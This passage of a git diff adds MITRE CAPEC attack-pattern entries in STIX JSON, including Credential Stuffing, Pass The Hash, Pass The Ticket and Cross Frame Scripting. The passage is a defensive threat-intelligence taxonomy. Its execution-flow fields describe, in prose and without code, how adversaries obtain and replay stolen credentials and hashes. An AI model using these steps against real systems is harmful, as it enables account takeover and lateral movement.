Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + 
"x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json new file mode 100644 index 0000000000000000000000000000000000000000..2aff9860d35f74b5ec80ca158cd504f385a912f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json 
@@ -0,0 +1,64 @@ +{ + "id": "bundle--f238564c-952c-45c7-8f00-ae33b3220afe", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n 
In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json new file mode 100644 index 0000000000000000000000000000000000000000..6a2848252562e893cf359f040648ad3648bd09dd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json 
@@ -0,0 +1,29 @@ +{ + "id": "bundle--477a61aa-5854-4f39-8615-de9d805d92d6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json new file mode 100644 index 0000000000000000000000000000000000000000..41c277822a02e9c9482f63573a9f4bff26180ce4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json 
@@ -0,0 +1,153 @@ +{ + "id": "bundle--8c683b8f-6f3e-43fc-8418-1e9bce62661f", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure 
Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + 
"Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

  2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. 
Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json new file mode 100644 index 0000000000000000000000000000000000000000..572ab3c32a7cda2b43adf6d44b870aa43b20a49d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json 
@@ -0,0 +1,139 @@ +{ + "id": "bundle--b78d511d-885a-4e80-a8ca-96fc5da62e17", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video 
conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

  2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

  2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json new file mode 100644 index 0000000000000000000000000000000000000000..6ebdad60ad336df8de8cc82850e5765fe3673ace --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json 
@@ -0,0 +1,83 @@
+{
+    "id": "bundle--f830457a-ca39-47ff-8de3-2ebc4f7ea308",
+    "objects": [
+        {
+            "created": "2018-07-31T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-645",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/645.html"
+                },
+                {
+                    "external_id": "CWE-522",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/522.html"
+                },
+                {
+                    "external_id": "CWE-294",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/294.html"
+                },
+                {
+                    "external_id": "CWE-308",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/308.html"
+                },
+                {
+                    "description": "Use Alternate Authentication Material:Pass The Ticket",
+                    "external_id": "T1550.003",
+                    "source_name": "ATTACK",
+                    "url": "https://attack.mitre.org/wiki/Technique/T1550/003"
+                },
+                {
+                    "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence",
+                    "external_id": "REF-584",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+                }
+            ],
+            "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f",
+            "modified": "2020-07-30T00:00:00.000Z",
+            "name": "Use of Captured Tickets (Pass The Ticket)",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Detailed",
+            "x_capec_can_precede_refs": [
+                "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b"
+            ],
+            "x_capec_child_of_refs": [
+                "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c"
+            ],
+            "x_capec_consequences": {
+                "Integrity": [
+                    "Gain Privileges"
+                ]
+            },
+            "x_capec_domains": [
+                "Software"
+            ],
+            "x_capec_example_instances": [
+                "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]"
+            ],
+            "x_capec_likelihood_of_attack": "Low",
+            "x_capec_prerequisites": [
+                "The adversary needs physical access to the victim system.",
+                "The use of a third-party credential harvesting tool."
+            ],
+            "x_capec_skills_required": {
+                "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.",
+                "Low": "Determine if Kerberos authentication is used on the server."
+            },
+            "x_capec_status": "Stable",
+            "x_capec_typical_severity": "High",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json
new file mode 100644
index 0000000000000000000000000000000000000000..aa953b9e769a7a40bc5a76279a8a97750f70273b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json
@@ -0,0 +1,42 @@
+{
+    "id": "bundle--5de8b51a-ccba-4280-8857-78a0801bea90",
+    "objects": [
+        {
+            "created": "2014-06-23T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-435",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/435.html"
+                },
+                {
+                    "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
+                    "external_id": "REF-348",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "http://www.social-engineer.org"
+                }
+            ],
+            "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905",
+            "modified": "2014-06-23T00:00:00.000Z",
+            "name": "Target Influence via Instant Rapport",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Detailed",
+            "x_capec_child_of_refs": [
+                "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030"
+            ],
+            "x_capec_domains": [
+                "Social Engineering"
+            ],
+            "x_capec_status": "Draft",
+            "x_capec_typical_severity": "Low",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json
new file mode 100644
index 0000000000000000000000000000000000000000..6b0da168754c29842fbb9c832e27c4930fb0c2ae
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json
@@ -0,0 +1,96 @@
+{
+    "id": "bundle--6efd529a-51c8-4c55-9e27-ced12da4ce37",
+    "objects": [
+        {
+            "created": "2015-11-09T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-555",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/555.html"
+                },
+                {
+                    "external_id": "CWE-522",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/522.html"
+                },
+                {
+                    "external_id": "CWE-308",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/308.html"
+                },
+                {
+                    "external_id": "CWE-309",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/309.html"
+                },
+                {
+                    "external_id": "CWE-294",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/294.html"
+                },
+                {
+                    "external_id": "CWE-263",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/263.html"
+                },
+                {
+                    "external_id": "CWE-262",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/262.html"
+                },
+                {
+                    "external_id": "CWE-521",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/521.html"
+                },
+                {
+                    "description": "Remote Services",
+                    "external_id": "T1021",
+                    "source_name": "ATTACK",
+                    "url": "https://attack.mitre.org/wiki/Technique/T1021"
+                },
+                {
+                    "description": "Email Collection:Remote Email Collection",
+                    "external_id": "T1114.002",
+                    "source_name": "ATTACK",
+                    "url": "https://attack.mitre.org/wiki/Technique/T1114/002"
+                },
+                {
+                    "description": "External Remote Services",
+                    "external_id": "T1133",
+                    "source_name": "ATTACK",
+                    "url": "https://attack.mitre.org/wiki/Technique/T1133"
+                }
+            ],
+            "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be",
+            "modified": "2022-09-29T00:00:00.000Z",
+            "name": "Remote Services with Stolen Credentials",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Standard",
+            "x_capec_can_precede_refs": [
+                "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b"
+            ],
+            "x_capec_child_of_refs": [
+                "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7"
+            ],
+            "x_capec_domains": [
+                "Software"
+            ],
+            "x_capec_example_instances": [
